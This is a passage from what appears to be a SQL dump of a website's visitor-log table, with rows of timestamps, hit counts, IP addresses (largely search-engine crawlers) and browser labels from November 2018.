1543320735,1,1,0,0,'54.36.149.81','other'),(341809,1543320961,1,1,0,0,'54.36.148.173','other'),(341810,1543320962,1,1,0,0,'46.229.168.135','other'),(341811,1543320972,1,1,0,0,'46.229.168.145','other'),(341812,1543320991,1,1,0,0,'54.36.149.17','other'),(341813,1543321146,1,1,0,0,'54.36.149.34','other'),(341814,1543321190,2,2,0,0,'91.196.178.93','firefox'),(341815,1543321451,1,1,0,0,'54.36.148.247','other'),(341816,1543322096,1,1,0,0,'66.249.66.157','chrome'),(341817,1543322098,1,1,0,0,'66.249.66.156','chrome'),(341818,1543322155,2,2,0,0,'91.242.162.52','other'),(341819,1543322555,1,1,0,0,'54.36.149.12','other'),(341820,1543322657,2,2,0,0,'95.132.19.73','chrome'),(341821,1543322687,3,3,0,0,'157.55.39.252','other'),(341822,1543322876,2,2,0,0,'95.132.54.39','firefox'),(341823,1543323049,2,2,0,0,'130.180.220.192','chrome'),(341824,1543323213,4,4,0,0,'40.77.167.175','other'),(341825,1543323231,1,1,0,0,'54.36.148.107','other'),(341826,1543323289,1,1,0,0,'46.229.168.138','other'),(341827,1543323509,1,1,0,0,'54.36.149.83','other'),(341828,1543323528,2,2,0,0,'91.242.162.52','other'),(341829,1543323769,1,1,0,0,'54.36.149.2','other'),(341830,1543324438,1,1,0,0,'54.36.148.244','other'),(341831,1543324473,1,1,0,0,'46.229.168.143','other'),(341832,1543324494,1,1,0,0,'54.36.148.234','other'),(341833,1543324603,1,1,0,0,'46.229.168.134','other'),(341834,1543324758,6,6,0,0,'207.46.13.136','other'),(341835,1543324769,2,2,0,0,'40.77.167.175','other'),(341836,1543325362,1,1,0,0,'46.229.168.151','other'),(341837,1543325367,1,1,0,0,'46.229.168.147','other'),(341838,1543325434,1,1,0,0,'46.211.107.253','chrome'),(341839,1543325630,1,1,0,0,'54.36.148.203','other'),(341840,1543325638,1,1,0,0,'54.36.149.46','other'),(341841,1543325808,4,4,0,0,'207.46.13.136','other'),(341842,1543326208,1,1,0,0,'18.221.136.197','opera'),(341843,1543326222,1,1,0,0,'91.237.107.25','chrome'),(341844,1543326254,1,1,0,0,'54.36.148.218','other'),(341845,1543326268,1,1,0,0,'54.36.148.98','other'),(341846,1543326496,1,1,0,0,'46.174.125.28','chrome'),(341847,1543326681,2,2,0,0,'207.46.13.101','other'),(341848,1543326865,2,2,0,0,'91.196.178.81','chrome'),(341849,1543326912,5,5,0,0,'178.154.244.29','other'),(341850,1543327218,1,1,0,0,'5.45.207.79','other'),(341851,1543327364,1,1,0,0,'46.211.107.253','chrome'),(341852,1543327537,3,3,0,0,'178.154.244.11','other'),(341853,1543327868,10,10,0,0,'178.154.244.29','other'),(341854,1543328316,4,4,0,0,'207.46.13.101','other'),(341855,1543328504,1,1,0,0,'178.154.244.11','other'),(341856,1543328903,1,1,0,0,'91.237.107.25','chrome'),(341857,1543329033,1,1,0,0,'54.36.148.103','other'),(341858,1543329069,3,3,0,0,'207.46.13.136','other'),(341859,1543329220,1,1,0,0,'8.29.198.25','other'),(341860,1543329243,2,2,0,0,'157.55.39.252','other'),(341861,1543329643,1,1,0,0,'95.163.255.62','other'),(341862,1543329646,1,1,0,0,'95.163.255.68','other'),(341863,1543329893,1,1,0,0,'207.46.13.101','other'),(341864,1543329953,2,2,0,0,'91.196.178.68','firefox'),(341865,1543330328,1,1,0,0,'91.196.178.97','chrome'),(341866,1543330494,1,1,0,0,'54.36.148.241','other'),(341867,1543330574,1,1,0,0,'37.54.149.108','chrome'),(341868,1543330609,5,5,0,0,'91.196.178.176','chrome'),(341869,1543330694,2,2,0,0,'91.196.178.81','chrome'),(341870,1543330942,1,1,0,0,'8.29.198.25','other'),(341871,1543330977,4,4,0,0,'40.77.167.175','other'),(341872,1543331267,2,2,0,0,'91.196.178.68','firefox'),(341873,1543331404,2,2,0,0,'207.46.13.136','other'),(341874,1543331442,1,1,0,0,'8.29.198.26','other'),(341875,1543331520,2,2,0,0,'37.73.100.114','chrome'),(341876,1543331748,1,1,0,0,'54.36.148.191','other'),(341877,1543331858,1,1,0,0,'93.78.184.83','chrome'),(341878,1543332009,4,4,0,0,'40.77.167.175','other'),(341879,1543332334,1,1,0,0,'54.36.149.38','other'),(341880,1543332507,2,2,0,0,'207.46.13.136','other'),(341881,1543332569,1,1,0,0,'54.36.148.39','other'),(341882,1543332815,1,1,0,0,'46.229.168.141','other'),(341883,1543332914,1,1,0,0,'54.36.148.164','other'),(341884,1543332999,4,4,0,0,'207.46.13.101','other'),(341885,1543333136,3,3,0,0,'91.196.178.169','chrome'),(341886,1543333147,1,1,0,0,'54.36.148.18','other'),(341887,1543333282,1,1,0,0,'54.36.149.88','other'),(341888,1543333598,1,1,0,0,'54.36.148.211','other'),(341889,1543333942,1,1,0,0,'54.36.149.83','other'),(341890,1543334444,1,1,0,0,'93.170.65.146','firefox'),(341891,1543334465,2,2,0,0,'157.55.39.252','other'),(341892,1543334535,3,3,0,0,'207.46.13.101','other'),(341893,1543334637,1,1,0,0,'54.36.148.28','other'),(341894,1543334727,1,1,0,0,'180.76.15.142','other'),(341895,1543334867,1,1,0,0,'95.163.255.115','other'),(341896,1543334897,1,1,0,0,'95.163.255.114','other'),(341897,1543334932,1,1,0,0,'95.163.255.109','other'),(341898,1543334961,2,2,0,0,'95.163.255.119','other'),(341899,1543335047,1,1,0,0,'95.163.255.105','other'),(341900,1543335054,1,1,0,0,'54.36.148.12','other'),(341901,1543335238,1,1,0,0,'178.154.244.29','other'),(341902,1543335342,1,1,0,0,'54.36.149.68','other'),(341903,1543335361,1,1,0,0,'54.36.149.77','other'),(341904,1543335552,1,1,0,0,'46.229.168.132','other'),(341905,1543335559,1,1,0,0,'46.229.168.146','other'),(341906,1543335579,1,1,0,0,'95.163.255.65','other'),(341907,1543335582,1,1,0,0,'95.163.255.66','other'),(341908,1543335702,3,3,0,0,'40.77.167.175','other'),(341909,1543335758,3,3,0,0,'207.46.13.136','other'),(341910,1543336397,2,2,0,0,'157.55.39.252','other'),(341911,1543336403,1,1,0,0,'54.36.149.57','other'),(341912,1543337343,1,1,0,0,'54.36.148.175','other'),(341913,1543337356,1,1,0,0,'54.36.149.78','other'),(341914,1543337491,6,6,0,0,'207.46.13.101','other'),(341915,1543338379,1,1,0,0,'54.36.148.194','other'),(341916,1543338557,1,1,0,0,'46.229.168.129','other'),(341917,1543338630,2,2,0,0,'157.55.39.252','other'),(341918,1543338670,2,2,0,0,'207.46.13.101','other'),(341919,1543339139,1,1,0,0,'93.170.65.146','firefox'),(341920,1543339149,1,1,0,0,'54.36.149.86','other'),(341921,1543339497,1,1,0,0,'54.36.148.244','other'),(341922,1543339599,1,1,0,0,'54.36.149.61','other'),(341923,1543339787,1,1,0,0,'46.229.168.129','other'),(341924,1543339987,1,1,0,0,'54.36.148.75','other'),(341925,1543340065,1,1,0,0,'8.29.198.27','other'),(341926,1543340098,2,2,0,0,'40.77.167.175','other'),(341927,1543340249,2,2,0,0,'46.211.109.35','chrome'),(341928,1543340458,2,2,0,0,'207.46.13.101','other'),(341929,1543340921,2,2,0,0,'91.196.178.73','firefox'),(341930,1543340957,3,3,0,0,'157.55.39.252','other'),(341931,1543341680,1,1,0,0,'54.36.148.189','other'),(341932,1543341776,2,2,0,0,'8.29.198.26','other'),(341933,1543341808,1,1,0,0,'46.211.125.250','msie'),(341934,1543341869,5,5,0,0,'207.46.13.136','other'),(341935,1543341935,2,2,0,0,'178.154.244.11','other'),(341936,1543341938,4,4,0,0,'178.154.244.29','other'),(341937,1543342064,2,2,0,0,'46.229.168.135','other'),(341938,1543342110,1,1,0,0,'54.36.148.238','other'),(341939,1543342219,1,1,0,0,'95.108.213.4','other'),(341940,1543342293,1,1,0,0,'77.111.247.169','chrome'),(341941,1543342335,1,1,0,0,'5.45.207.79','other'),(341942,1543342569,1,1,0,0,'54.36.148.122','other'),(341943,1543342589,2,2,0,0,'157.55.39.252','other'),(341944,1543342867,1,1,0,0,'46.229.168.133','other'),(341945,1543343247,1,1,0,0,'46.211.125.250','msie'),(341946,1543343477,1,1,0,0,'54.36.148.234','other'),(341947,1543343506,1,1,0,0,'54.36.148.180','other'),(341948,1543343663,1,1,0,0,'54.36.148.10','other'),(341949,1543343792,2,2,0,0,'207.46.13.101','other'),(341950,1543343845,1,1,0,0,'207.46.13.136','other'),(341951,1543343986,1,1,0,0,'13.66.139.0','other'),(341952,1543344062,1,1,0,0,'54.36.149.44','other'),(341953,1543344088,1,1,0,0,'46.229.168.150','other'),(341954,1543344120,1,1,0,0,'54.36.148.139','other'),(341955,1543344435,1,1,0,0,'178.154.244.11','other'),(341956,1543344453,1,1,0,0,'109.251.148.50','firefox'),(341957,1543344528,1,1,0,0,'66.249.75.15','chrome'),(341958,1543344675,1,1,0,0,'54.36.148.84','other'),(341959,1543344730,1,1,0,0,'66.249.75.20','chrome'),(341960,1543344990,1,1,0,0,'54.36.149.96','other'),(341961,1543345130,4,4,0,0,'40.77.167.175','other'),(341962,1543345196,4,4,0,0,'157.55.39.252','other'),(341963,1543345394,2,2,0,0,'207.46.13.136','other'),(341964,1543346019,1,1,0,0,'46.229.168.136','other'),(341965,1543346757,1,1,0,0,'54.36.149.85','other'),(341966,1543346839,2,2,0,0,'207.46.13.136','other'),(341967,1543346847,1,1,0,0,'46.229.168.138','other'),(341968,1543347032,4,4,0,0,'207.46.13.101','other'),(341969,1543347333,1,1,0,0,'46.229.168.150','other'),(341970,1543347399,1,1,0,0,'54.36.148.84','other'),(341971,1543347560,1,1,0,0,'54.36.148.68','other'),(341972,1543347906,1,1,0,0,'46.211.67.239','chrome'),(341973,1543347954,1,1,0,0,'46.229.168.149','other'),(341974,1543347962,1,1,0,0,'46.229.168.133','other'),(341975,1543348112,2,2,0,0,'91.196.178.133','firefox'),(341976,1543348452,1,1,0,0,'54.36.149.93','other'),(341977,1543348499,4,4,0,0,'207.46.13.136','other'),(341978,1543349065,3,3,0,0,'157.55.39.252','other'),(341979,1543349269,1,1,0,0,'46.229.168.144','other'),(341980,1543349320,1,1,0,0,'54.36.149.32','other'),(341981,1543349676,1,1,0,0,'178.154.244.11','other'),(341982,1543349680,4,4,0,0,'40.77.167.175','other'),(341983,1543349767,1,1,0,0,'54.36.148.58','other'),(341984,1543350303,1,1,0,0,'54.36.149.84','other'),(341985,1543350345,1,1,0,0,'46.229.168.137','other'),(341986,1543350473,1,1,0,0,'54.36.148.242','other'),(341987,1543350485,1,1,0,0,'54.36.148.176','other'),(341988,1543350714,1,1,0,0,'54.36.148.138','other'),(341989,1543350787,1,1,0,0,'66.249.75.22','chrome'),(341990,1543350908,1,1,0,0,'8.29.198.25','other'),(341991,1543350989,1,1,0,0,'178.154.244.11','other'),(341992,1543351081,1,0,1,0,'66.249.69.143',''),(341993,1543351099,1,0,1,0,'66.249.69.149',''),(341994,1543351108,1,1,0,0,'54.36.148.154','other'),(341995,1543351216,2,2,0,0,'40.77.167.175','other'),(341996,1543351232,1,1,0,0,'157.55.39.252','other'),(341997,1543351673,1,1,0,0,'54.36.148.24','other'),(341998,1543351827,5,5,0,0,'207.46.13.136','other'),(341999,1543352069,1,1,0,0,'54.36.149.51','other'),(342000,1543352120,2,2,0,0,'40.77.167.175','other'),(342001,1543352411,1,1,0,0,'66.249.75.16','chrome'),(342002,1543352552,1,1,0,0,'54.36.148.197','other'),(342003,1543352566,1,1,0,0,'66.249.69.145','chrome'),(342004,1543352567,2,2,0,0,'66.249.69.149','chrome'),(342005,1543352581,1,1,0,0,'66.249.75.142','chrome'),(342006,1543352586,4,4,0,0,'178.154.244.29','other'),(342007,1543352630,1,1,0,0,'8.29.198.25','other'),(342008,1543352773,1,1,0,0,'46.229.168.143','other'),(342009,1543352805,1,1,0,0,'207.46.13.136','other'),(342010,1543353087,4,4,0,0,'157.55.39.252','other'),(342011,1543353093,1,1,0,0,'46.229.168.137','other'),(342012,1543353098,1,1,0,0,'8.29.198.27','other'),(342013,1543353481,1,1,0,0,'46.229.168.152','other'),(342014,1543353595,1,1,0,0,'54.36.148.247','other'),(342015,1543353863,1,1,0,0,'54.36.148.252','other'),(342016,1543354308,2,2,0,0,'54.36.148.203','other'),(342017,1543354405,1,1,0,0,'207.46.13.136','other'),(342018,1543354458,2,2,0,0,'157.55.39.252','other'),(342019,1543354601,87,87,0,0,'148.251.247.241','other'),(342020,1543354823,2,2,0,0,'40.77.167.175','other'),(342021,1543354974,1,1,0,0,'178.154.244.29','other'),(342022,1543355626,4,4,0,0,'207.46.13.101','other'),(342023,1543355657,1,1,0,0,'141.8.142.103','other'),(342024,1543355667,1,1,0,0,'46.229.168.151','other'),(342025,1543355671,1,1,0,0,'46.229.168.143','other'),(342026,1543355770,1,1,0,0,'54.36.148.130','other'),(342027,1543355775,1,1,0,0,'5.45.207.79','other'),(342028,1543356055,3,3,0,0,'178.154.244.29','other'),(342029,1543356267,4,4,0,0,'178.154.244.11','other'),(342030,1543356450,2,2,0,0,'207.46.13.136','other'),(342031,1543356479,1,1,0,0,'54.36.148.55','other'),(342032,1543356747,3,3,0,0,'157.55.39.252','other'),(342033,1543356944,1,1,0,0,'54.36.148.245','other'),(342034,1543356945,2,2,0,0,'207.46.13.101','other'),(342035,1543357076,2,2,0,0,'178.154.244.29','other'),(342036,1543357271,1,1,0,0,'54.36.149.34','other'),(342037,1543357875,2,2,0,0,'40.77.167.175','other'),(342038,1543358064,2,2,0,0,'46.229.168.154','other'),(342039,1543358120,2,2,0,0,'157.55.39.252','other'),(342040,1543358308,1,1,0,0,'178.154.244.29','other'),(342041,1543359076,1,1,0,0,'46.229.168.142','other'),(342042,1543359079,1,1,0,0,'46.229.168.136','other'),(342043,1543359240,2,2,0,0,'157.55.39.252','other'),(342044,1543359585,1,1,0,0,'95.163.255.104','other'),(342045,1543359593,1,1,0,0,'95.163.255.108','other'),(342046,1543359764,1,1,0,0,'54.36.148.91','other'),(342047,1543359842,1,1,0,0,'54.36.148.207','other'),(342048,1543360235,2,2,0,0,'207.46.13.101','other'),(342049,1543360379,2,2,0,0,'207.46.13.216','other'),(342050,1543361301,1,1,0,0,'54.36.148.51','other'),(342051,1543361607,1,1,0,0,'46.229.168.151','other'),(342052,1543361610,1,1,0,0,'46.229.168.142','other'),(342053,1543361749,1,1,0,0,'8.29.198.25','other'),(342054,1543361801,2,2,0,0,'95.213.141.126','opera'),(342055,1543361933,8,8,0,0,'207.46.13.216','other'),(342056,1543362390,2,2,0,0,'207.46.13.217','other'),(342057,1543362511,2,2,0,0,'207.46.13.215','other'),(342058,1543362619,4,4,0,0,'207.46.13.218','other'),(342059,1543362645,1,1,0,0,'54.36.149.70','other'),(342060,1543362899,2,2,0,0,'207.46.13.216','other'),(342061,1543363415,1,1,0,0,'54.36.149.26','other'),(342062,1543363465,1,1,0,0,'8.29.198.25','other'),(342063,1543363470,4,4,0,0,'207.46.13.217','other'),(342064,1543363724,1,1,0,0,'54.36.148.103','other'),(342065,1543363926,1,1,0,0,'46.229.168.135','other'),(342066,1543363944,1,1,0,0,'8.29.198.27','other'),(342067,1543364137,1,1,0,0,'54.36.149.100','other'),(342068,1543364454,1,1,0,0,'54.36.148.177','other'),(342069,1543364535,4,4,0,0,'207.46.13.217','other'),(342070,1543364826,1,1,0,0,'54.36.148.116','other'),(342071,1543364990,3,3,0,0,'207.46.13.216','other'),(342072,1543365049,3,3,0,0,'207.46.13.218','other'),(342073,1543365286,1,1,0,0,'54.36.148.48','other'),(342074,1543365659,1,1,0,0,'64.185.235.234','chrome'),(342075,1543365909,3,3,0,0,'207.46.13.215','other'),(342076,1543366282,1,1,0,0,'207.46.13.217','other'),(342077,1543366796,1,1,0,0,'54.36.148.136','other'),(342078,1543367033,1,1,0,0,'46.229.168.130','other'),(342079,1543367789,1,1,0,0,'54.36.149.37','other'),(342080,1543367831,2,2,0,0,'207.46.13.218','other'),(342081,1543367911,1,1,0,0,'46.229.168.135','other'),(342082,1543368059,2,2,0,0,'178.154.244.29','other'),(342083,1543368074,2,2,0,0,'207.46.13.215','other'),(342084,1543368452,1,1,0,0,'178.154.244.11','other'),(342085,1543368909,1,1,0,0,'54.36.148.168','other'),(342086,1543369163,1,1,0,0,'54.36.149.25','other'),(342087,1543369209,2,2,0,0,'91.209.11.236','other'),(342088,1543369366,1,1,0,0,'178.154.244.29','other'),(342089,1543369373,2,2,0,0,'54.36.148.143','other'),(342090,1543369504,1,1,0,0,'54.36.149.102','other'),(342091,1543370031,4,4,0,0,'207.46.13.218','other'),(342092,1543370623,4,4,0,0,'207.46.13.215','other'),(342093,1543370713,1,1,0,0,'54.36.148.253','other'),(342094,1543370869,2,2,0,0,'207.46.13.216','other'),(342095,1543371111,1,1,0,0,'54.36.149.6','other'),(342096,1543371536,1,1,0,0,'54.36.148.107','other'),(342097,1543371602,1,1,0,0,'178.154.244.11','other'),(342098,1543371606,1,1,0,0,'178.154.244.29','other'),(342099,1543371689,1,1,0,0,'54.36.149.50','other'),(342100,1543372009,1,1,0,0,'54.36.148.200','other'),(342101,1543372093,1,1,0,0,'54.36.149.56','other'),(342102,1543372473,1,1,0,0,'46.229.168.149','other'),(342103,1543372603,1,1,0,0,'8.29.198.26','other'),(342104,1543372652,2,2,0,0,'52.88.105.216','chrome'),(342105,1543372788,1,1,0,0,'54.36.148.30','other'),(342106,1543372877,2,2,0,0,'52.53.201.78','chrome'),(342107,1543372978,1,1,0,0,'54.36.148.128','other'),(342108,1543372999,1,1,0,0,'54.36.149.8','other'),(342109,1543373104,2,2,0,0,'207.46.13.217','other'),(342110,1543373535,1,1,0,0,'54.36.148.143','other'),(342111,1543373617,1,1,0,0,'13.57.233.99','chrome'),(342112,1543374294,2,2,0,0,'8.29.198.25','other'),(342113,1543374449,2,2,0,0,'178.154.244.29','other'),(342114,1543374641,2,2,0,0,'207.46.13.218','other'),(342115,1543374994,1,1,0,0,'46.229.168.138','other'),(342116,1543375184,1,1,0,0,'54.36.148.182','other'),(342117,1543375483,1,1,0,0,'54.36.149.91','other'),(342118,1543375497,1,1,0,0,'54.36.149.38','other'),(342119,1543375527,2,2,0,0,'207.46.13.217','other'),(342120,1543375580,6,6,0,0,'207.46.13.215','other'),(342121,1543375686,2,2,0,0,'207.46.13.216','other'),(342122,1543375858,3,3,0,0,'207.46.13.218','other'),(342123,1543376214,1,1,0,0,'54.36.148.156','other'),(342124,1543376711,6,6,0,0,'207.46.13.217','other'),(342125,1543377006,1,1,0,0,'54.36.148.66','other'),(342126,1543377115,4,4,0,0,'207.46.13.215','other'),(342127,1543377388,2,2,0,0,'207.46.13.218','other'),(342128,1543377498,1,1,0,0,'91.242.162.2','other'),(342129,1543377592,1,1,0,0,'54.36.149.1','other'),(342130,1543377594,1,1,0,0,'54.36.149.72','other'),(342131,1543377816,1,1,0,0,'95.163.255.108','other'),(342132,1543377824,1,1,0,0,'95.163.255.116','other'),(342133,1543377876,4,4,0,0,'91.196.178.175','chrome'),(342134,1543378163,2,2,0,0,'207.46.13.217','other'),(342135,1543378605,1,1,0,0,'54.36.148.61','other'),(342136,1543378641,1,1,0,0,'54.36.148.219','other'),(342137,1543378650,4,4,0,0,'178.154.244.29','other'),(342138,1543378744,1,1,0,0,'54.36.149.92','other'),(342139,1543378808,4,4,0,0,'178.154.244.11','other'),(342140,1543378817,2,2,0,0,'91.242.162.2','other'),(342141,1543378867,1,1,0,0,'54.36.149.57','other'),(342142,1543378963,1,1,0,0,'5.45.207.79','other'),(342143,1543378974,1,1,0,0,'207.46.13.218','other'),(342144,1543379041,2,2,0,0,'207.46.13.216','other'),(342145,1543379331,1,1,0,0,'46.229.168.148','other'),(342146,1543379333,1,1,0,0,'46.229.168.149','other'),(342147,1543379338,1,1,0,0,'46.229.168.139','other'),(342148,1543379360,1,1,0,0,'54.36.148.223','other'),(342149,1543379630,1,1,0,0,'178.154.244.29','other'),(342150,1543379697,1,1,0,0,'207.46.13.215','other'),(342151,1543380109,1,1,0,0,'54.36.149.72','other'),(342152,1543380597,1,1,0,0,'178.154.244.29','other'),(342153,1543380667,2,2,0,0,'207.46.13.215','other'),(342154,1543380712,7,7,0,0,'207.46.13.216','other'),(342155,1543380886,4,4,0,0,'207.46.13.218','other'),(342156,1543381092,1,1,0,0,'54.36.148.129','other'),(342157,1543381625,4,4,0,0,'207.46.13.215','other'),(342158,1543381635,1,1,0,0,'54.36.149.60','other'),(342159,1543381702,1,1,0,0,'54.36.148.70','other'),(342160,1543382415,5,5,0,0,'207.46.13.216','other'),(342161,1543382437,4,4,0,0,'207.46.13.218','other'),(342162,1543382946,1,1,0,0,'54.36.148.67','other'),(342163,1543383019,1,1,0,0,'46.229.168.146','other'),(342164,1543383020,1,1,0,0,'46.229.168.138','other'),(342165,1543383046,1,1,0,0,'54.36.149.4','other'),(342166,1543383428,1,1,0,0,'54.36.148.214','other'),(342167,1543383441,1,1,0,0,'8.29.198.27','other'),(342168,1543383501,2,2,0,0,'91.196.178.135','firefox'),(342169,1543383675,1,1,0,0,'54.36.148.32','other'),(342170,1543383682,5,5,0,0,'207.46.13.215','other'),(342171,1543383829,30,30,0,0,'148.251.69.139','other'),(342172,1543383927,1,1,0,0,'207.46.13.216','other'),(342173,1543384104,1,0,1,0,'66.249.75.20',''),(342174,1543384210,5,5,0,0,'207.46.13.217','other'),(342175,1543384332,1,1,0,0,'40.77.167.218','other'),(342176,1543384353,1,1,0,0,'54.36.148.158','other'),(342177,1543384530,1,1,0,0,'66.249.75.15','chrome'),(342178,1543384531,1,1,0,0,'66.249.75.21','chrome'),(342179,1543384694,1,1,0,0,'54.36.148.150','other'),(342180,1543384747,101,101,0,0,'158.69.23.126','other'),(342181,1543385115,1,1,0,0,'178.154.244.29','other'),(342182,1543385128,2,2,0,0,'8.29.198.25','other'),(342183,1543385195,4,4,0,0,'207.46.13.217','other'),(342184,1543385740,1,1,0,0,'54.36.148.47','other'),(342185,1543385886,1,1,0,0,'91.196.178.130','chrome'),(342186,1543386113,1,1,0,0,'46.229.168.133','other'),(342187,1543386250,5,5,0,0,'207.46.13.215','other'),(342188,1543386352,1,1,0,0,'77.111.244.4','chrome'),(342189,1543386582,1,1,0,0,'207.46.13.217','other'),(342190,1543386736,3,3,0,0,'207.46.13.216','other'),(342191,1543386747,1,1,0,0,'54.36.148.143','other'),(342192,1543386965,1,1,0,0,'46.229.168.145','other'),(342193,1543386975,1,1,0,0,'46.229.168.137','other'),(342194,1543387247,2,2,0,0,'178.154.244.29','other'),(342195,1543387347,1,1,0,0,'46.229.168.136','other'),(342196,1543387392,2,2,0,0,'91.196.178.83','firefox'),(342197,1543387577,2,2,0,0,'207.46.13.217','other'),(342198,1543387603,1,1,0,0,'54.36.148.29','other'),(342199,1543387620,1,1,0,0,'207.46.13.218','other'),(342200,1543387629,1,1,0,0,'66.249.69.145','chrome'),(342202,1543387784,1,1,0,0,'46.229.168.146','other'),(342203,1543387790,1,1,0,0,'46.229.168.148','other'),(342204,1543387803,1,1,0,0,'66.249.69.150','chrome'),(342205,1543388286,1,1,0,0,'46.229.168.154','other'),(342206,1543388295,1,1,0,0,'46.229.168.139','other'),(342207,1543388351,1,1,0,0,'54.36.149.14','other'),(342208,1543388354,2,2,0,0,'207.46.13.215','other'),(342209,1543388381,1,1,0,0,'54.36.148.248','other'),(342210,1543388486,1,1,0,0,'207.46.13.217','other'),(342211,1543388559,3,3,0,0,'178.154.244.11','other'),(342212,1543388635,2,2,0,0,'207.46.13.218','other'),(342213,1543388648,2,2,0,0,'178.154.244.29','other'),(342214,1543388737,1,1,0,0,'54.36.148.177','other'),(342215,1543389376,1,1,0,0,'46.229.168.143','other'),(342216,1543389381,1,1,0,0,'46.229.168.148','other'),(342217,1543389623,4,4,0,0,'207.46.13.218','other'),(342218,1543389694,2,2,0,0,'5.45.207.79','other'),(342219,1543389743,5,5,0,0,'207.46.13.215','other'),(342220,1543390284,1,1,0,0,'178.154.244.29','other'),(342221,1543390379,1,1,0,0,'46.229.168.139','other'),(342222,1543390472,4,4,0,0,'207.46.13.216','other'),(342223,1543390529,4,4,0,0,'207.46.13.218','other'),(342224,1543391070,2,2,0,0,'207.46.13.217','other'),(342225,1543391142,1,1,0,0,'66.249.69.149','chrome'),(342226,1543391543,1,1,0,0,'46.229.168.153','other'),(342227,1543391553,1,1,0,0,'46.229.168.137','other'),(342228,1543391589,1,1,0,0,'40.77.167.218','other'),(342229,1543391646,3,3,0,0,'207.46.13.215','other'),(342230,1543391649,1,1,0,0,'54.36.148.193','other'),(342231,1543391651,4,4,0,0,'207.46.13.218','other'),(342232,1543391714,1,1,0,0,'54.36.148.182','other'),(342233,1543392268,2,2,0,0,'207.46.13.216','other'),(342234,1543392361,1,1,0,0,'54.36.148.11','other'),(342235,1543392692,1,1,0,0,'54.36.149.57','other'),(342236,1543392917,4,4,0,0,'5.9.123.164','other'),(342237,1543393171,1,1,0,0,'54.36.148.48','other'),(342238,1543393204,5,5,0,0,'207.46.13.216','other'),(342239,1543393247,2,2,0,0,'91.196.178.83','firefox'),(342240,1543393255,1,1,0,0,'54.36.148.194','other'),(342241,1543393259,2,2,0,0,'91.196.178.81','chrome'),(342242,1543393645,1,1,0,0,'66.249.69.148','chrome'),(342243,1543393717,4,4,0,0,'207.46.13.217','other'),(342244,1543393994,4,4,0,0,'207.46.13.218','other'),(342245,1543394091,1,1,0,0,'207.46.13.215','other'),(342246,1543394224,1,1,0,0,'91.196.178.83','firefox'),(342247,1543394278,1,1,0,0,'8.29.198.26','other'),(342248,1543394474,2,2,0,0,'207.46.13.216','other'),(342249,1543394609,1,1,0,0,'40.77.167.214','other'),(342250,1543394719,1,1,0,0,'207.46.13.217','other'),(342251,1543394855,1,1,0,0,'54.36.148.56','other'),(342252,1543394940,1,1,0,0,'5.45.207.19','other'),(342253,1543394944,2,2,0,0,'178.154.244.11','other'),(342254,1543395069,1,1,0,0,'46.229.168.150','other'),(342255,1543395294,1,1,0,0,'54.36.149.25','other'),(342256,1543395357,1,1,0,0,'46.229.168.149','other'),(342257,1543395424,1,1,0,0,'66.249.75.155','chrome'),(342258,1543395425,1,1,0,0,'66.249.75.142','chrome'),(342259,1543395467,4,4,0,0,'207.46.13.218','other'),(342260,1543395977,1,1,0,0,'8.29.198.26','other'),(342261,1543396027,1,1,0,0,'54.36.148.69','other'),(342262,1543396043,1,1,0,0,'87.250.224.47','other'),(342263,1543396148,2,2,0,0,'91.196.178.81','chrome'),(342264,1543396190,1,1,0,0,'207.46.13.215','other'),(342265,1543396466,1,1,0,0,'8.29.198.25','other'),(342266,1543396643,1,1,0,0,'46.229.168.152','other'),(342267,1543396649,2,2,0,0,'207.46.13.218','other'),(342268,1543396677,1,1,0,0,'46.229.168.149','other'),(342269,1543396806,1,1,0,0,'46.229.168.143','other'),(342270,1543397387,4,4,0,0,'91.196.178.83','firefox'),(342271,1543397394,3,3,0,0,'46.200.0.198','chrome'),(342272,1543397640,1,1,0,0,'207.46.13.215','other'),(342273,1543397936,1,1,0,0,'77.111.247.178','chrome'),(342274,1543398063,2,2,0,0,'91.209.11.236','other'),(342275,1543398286,1,1,0,0,'54.36.148.212','other'),(342276,1543398440,4,4,0,0,'178.154.244.11','other'),(342277,1543398615,1,1,0,0,'54.36.148.11','other'),(342278,1543398637,1,1,0,0,'46.229.168.144','other'),(342279,1543398721,1,1,0,0,'91.242.162.83','other'),(342280,1543398729,5,5,0,0,'178.154.244.29','other'),(342281,1543398783,3,3,0,0,'91.124.182.170','firefox'),(342282,1543398894,1,1,0,0,'54.36.148.120','other'),(342283,1543398980,1,1,0,0,'95.108.213.4','other'),(342284,1543398983,1,1,0,0,'87.250.224.47','other'),(342285,1543399505,1,1,0,0,'54.36.148.149','other'),(342286,1543399569,2,2,0,0,'207.46.13.217','other'),(342287,1543399739,1,1,0,0,'207.46.13.216','other'),(342288,1543400094,1,1,0,0,'5.58.67.166','opera'),(342289,1543400494,2,2,0,0,'207.46.13.217','other'),(342290,1543400720,1,1,0,0,'66.249.69.144','chrome'),(342291,1543400721,1,1,0,0,'66.249.69.149','chrome'),(342292,1543400731,1,1,0,0,'207.46.13.215','other'),(342293,1543400784,1,1,0,0,'54.36.149.103','other'),(342294,1543401122,1,1,0,0,'54.36.148.106','other'),(342295,1543401187,1,1,0,0,'46.219.200.9','chrome'),(342296,1543401189,1,1,0,0,'54.36.148.27','other'),(342297,1543401441,2,2,0,0,'91.196.178.93','firefox'),(342298,1543401691,1,1,0,0,'46.229.168.153','other'),(342299,1543401699,1,1,0,0,'46.229.168.132','other'),(342300,1543401835,1,1,0,0,'178.95.246.220','chrome'),(342301,1543402032,4,4,0,0,'195.114.136.66','chrome'),(342302,1543402103,1,1,0,0,'54.36.148.195','other'),(342303,1543402376,3,3,0,0,'207.46.13.216','other'),(342304,1543402669,2,2,0,0,'207.46.13.215','other'),(342305,1543402937,1,1,0,0,'37.55.225.27','chrome'),(342306,1543402945,1,1,0,0,'54.36.148.136','other'),(342307,1543403019,1,1,0,0,'54.36.149.78','other'),(342308,1543403052,1,1,0,0,'54.36.148.67','other'),(342309,1543403513,1,1,0,0,'46.229.168.145','other'),(342310,1543403965,2,2,0,0,'46.174.125.28','chrome'),(342311,1543404431,1,1,0,0,'54.36.148.138','other'),(342312,1543404609,8,8,0,0,'207.46.13.215','other'),(342313,1543404641,1,1,0,0,'94.179.38.119','chrome'),(342314,1543404819,1,1,0,0,'66.249.75.15','chrome'),(342315,1543404820,1,1,0,0,'66.249.75.21','chrome'),(342316,1543405108,1,1,0,0,'8.29.198.27','other'),(342317,1543405579,1,1,0,0,'54.36.148.78','other'),(342318,1543405760,1,1,0,0,'54.36.148.110','other'),(342319,1543405761,1,1,0,0,'54.36.148.37','other'),(342320,1543405770,1,1,0,0,'54.36.149.24','other'),(342321,1543405789,2